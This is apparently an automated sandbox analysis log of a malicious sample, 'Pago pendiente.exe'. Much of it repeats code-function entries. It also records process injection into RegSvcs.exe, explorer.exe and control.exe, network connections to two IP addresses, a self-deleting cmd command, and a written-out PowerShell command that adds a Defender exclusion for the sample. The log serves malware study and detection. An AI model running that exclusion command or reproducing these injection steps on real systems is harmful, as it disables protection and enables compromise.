          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E420 mov eax, dword ptr fs:[00000030h]5_2_0142E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142C427 mov eax, dword ptr fs:[00000030h]5_2_0142C427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A430 mov eax, dword ptr fs:[00000030h]5_2_0146A430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014304E5 mov ecx, dword ptr fs:[00000030h]5_2_014304E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EA49A mov eax, dword ptr fs:[00000030h]5_2_014EA49A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014364AB mov eax, dword ptr fs:[00000030h]5_2_014364AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014644B0 mov ecx, dword ptr fs:[00000030h]5_2_014644B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BA4B0 mov eax, dword ptr fs:[00000030h]5_2_014BA4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146674D mov esi, dword ptr fs:[00000030h]5_2_0146674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146674D mov eax, dword ptr fs:[00000030h]5_2_0146674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146674D mov eax, dword ptr fs:[00000030h]5_2_0146674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430750 mov eax, dword ptr fs:[00000030h]5_2_01430750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BE75D mov eax, dword ptr fs:[00000030h]5_2_014BE75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472750 mov eax, dword ptr fs:[00000030h]5_2_01472750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472750 mov eax, dword ptr fs:[00000030h]5_2_01472750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B4755 mov eax, dword ptr fs:[00000030h]5_2_014B4755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438770 mov eax, dword ptr fs:[00000030h]5_2_01438770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146C700 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01430710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01460710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146C720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146273C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014AC730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0143C7C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014B07C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014527ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BE7E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014347FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014D678E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014307AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014E47A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0144C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014F866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146A660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01462674 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014AE609 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0144260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01472619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0144E627 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01466620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01468620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0143262C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146A6C7 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146A6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014AE6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014B06F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01434690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146C6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014666B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014B0946 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01504940 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01456962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0147096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0147096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014D4978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BC97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014AE908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BC912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01428918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014B892A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014C892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014C69C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0143A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014649D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014FA9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BE9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014629F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014309AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014B89B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014B89B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01442840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01460854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01434859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BE872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014C6870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BC810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01452835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01452835 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014D483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0145E8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_015008C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014FA8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01430887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BC89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014E4B4B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01502B57 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014C6B40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014FAB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014D8B42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01428B50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014DEB50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0142CB7E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01504B00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0145EB20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014F8B28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01450BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01430BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014DEBD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01438BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0145EBFC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BCBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01440BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014E4BB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01436A50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01440A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146CA6F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014DEA60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014ACA72 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_014BCA11 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146CA24 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0145EA2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01454A35 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146CA38 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01486ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01430AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_01464AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0146AAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_0143EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0006860F GetProcessHeap,HeapFree,memset
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000642F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00064550 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\Pago pendiente.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 103.224.212.216 80
          Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80
          Source: C:\Users\user\Desktop\Pago pendiente.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"
          Source: C:\Users\user\Desktop\Pago pendiente.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Pago pendiente.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 1028
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 1028
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 60000
          Source: C:\Users\user\Desktop\Pago pendiente.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\Pago pendiente.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\Pago pendiente.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A36008
          Source: C:\Users\user\Desktop\Pago pendiente.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"
          Source: C:\Users\user\Desktop\Pago pendiente.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: explorer.exe, 00000006.00000003.3097001927.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4449891914.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097220261.0000000009C21000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000006.00000002.4443935876.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2011719338.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.4443935876.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2020151196.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2011719338.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.4443935876.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2011719338.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4443935876.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2011719338.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000002.4443289671.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2011068724.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Users\user\Desktop\Pago pendiente.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
